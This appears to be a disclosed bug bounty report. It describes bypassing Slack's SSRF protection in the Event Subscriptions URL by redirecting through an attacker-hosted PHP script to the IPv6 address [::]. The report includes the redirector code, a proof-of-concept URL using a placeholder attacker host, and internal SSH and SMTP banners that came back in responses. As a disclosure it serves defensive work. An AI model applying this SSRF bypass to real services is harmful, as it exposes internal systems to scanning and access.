ElberH1:386292Slack: Bypass of the SSRF protection in Event Subscriptions parameter.
The vulnerability is present in the βEvent Subscriptionsβ parameter where:
"Your app can subscribe to be notified of events in Slack (for example, when a user adds a reaction or creates a file) at a URL you choose. ".
URL:
https://api.slack.com/apps/YOUAPPCODE/event-subscriptions?
When we add a site that does not meet API standards, we receive the following message:
{F323999}
Your request URL gave us a 500 error. Update your URL to receive a new request and challenge value.
After testing several SSRF techniques I found a bypass for this protection.
Using an IPV6 vector [::].
On my host, x.php has:
<?php
header("location: ".$_GET['u']);
?>
PoC:
http://hacker.site/x.php/?u=http://[::]:22/
Response:
SSH [::]:22
{F324002}
"body": {
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Protocol mismatch.
}
SMNTP [::]:25
{F324001}
"body": {
220 squid-iad-ypfw.tinyspeck.com ESMTP Postfix
221 2.7.0 Error: I can break rules, too. Goodbye.
}
Non-existent port:
{F324000}
Impact
In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources, and scan for internal ports and get the versions of the services running on the server.
Referer: https://www.owasp.org/index.php/Server_Side_Request_Forgery
https://hackerone.com/reports/61312